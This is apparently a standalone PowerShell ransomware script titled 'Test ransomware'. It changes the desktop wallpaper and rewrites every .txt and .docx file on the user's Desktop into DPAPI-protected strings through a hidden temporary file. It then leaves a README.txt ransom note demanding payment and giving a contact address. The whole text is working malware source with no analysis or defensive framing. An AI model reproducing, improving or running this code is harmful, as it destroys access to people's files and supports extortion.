Test ransomware

1. Function Set-WallPaper($Value)
2. {
3. Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $value
4. Start-Sleep -s 1
5. rundll32.exe user32.dll, UpdatePerUserSystemParameters 1, True
6. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
7. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
8. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
9. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
10. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
11. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
12. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
13. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
14. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
15. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
16. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
17. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
18. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
19. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
20. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
21. RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
22. }
23. $dir = (Get-Location).tostring() + "\wallpaper.jpg"
24. Set-WallPaper -value $dir
25. $path = [Environment]::GetFolderPath("Desktop")
26. Get-ChildItem -Path $path -Recurse -Include *.txt | ForEach-Object {
27. $fileName = $_
28. $fileTmp = $path + "\tmp.txt"
29. $fileTmpAttributes=Get-Item $fileTmp -Force
30. $fileTmpAttributes.attributes="Hidden"
31. Write-Host $fileName
32. Get-Content $fileName | ForEach-Object {
33. $tmp = $_ | ConvertTo-SecureString -AsPlainText -Force
34. $result = ConvertFrom-SecureString $tmp
35. Add-Content $fileTmp $result
36. }
37. Start-Sleep -s 1
38. Clear-Content $fileName
39. Get-Content $fileTmp | ForEach-Object {
40. Add-Content $fileName $_
41. }
42. Clear-Content $fileTmp
43. Start-Sleep -s 1
44. }
45. Remove-Item -Path $fileTmp
46. "All your personal files have been encrypted!" | Out-File -FilePath ($path+"\README.txt")
47. Add-Content ($path+"\README.txt") "If you want restore your data, you have to pay!"
48. Add-Content ($path+"\README.txt") "Contact us: no-reply@hacker.ahihi"
49.  
50. Get-ChildItem -Path $path -Recurse -Include *.docx | ForEach-Object {
51. $fileName = $_
52. $fileTmp = $path + "\tmp.txt"
53. $fileTmpAttributes=Get-Item $fileTmp -Force
54. $fileTmpAttributes.attributes="Hidden"
55. Write-Host $fileName
56. Get-Content $fileName | ForEach-Object {
57. $tmp = $_ | ConvertTo-SecureString -AsPlainText -Force
58. $result = ConvertFrom-SecureString $tmp
59. Add-Content $fileTmp $result
60. }
61. Start-Sleep -s 1
62. Clear-Content $fileName
63. Get-Content $fileTmp | ForEach-Object {
64. Add-Content $fileName $_
65. }
66. Clear-Content $fileTmp
67. Start-Sleep -s 1
68. }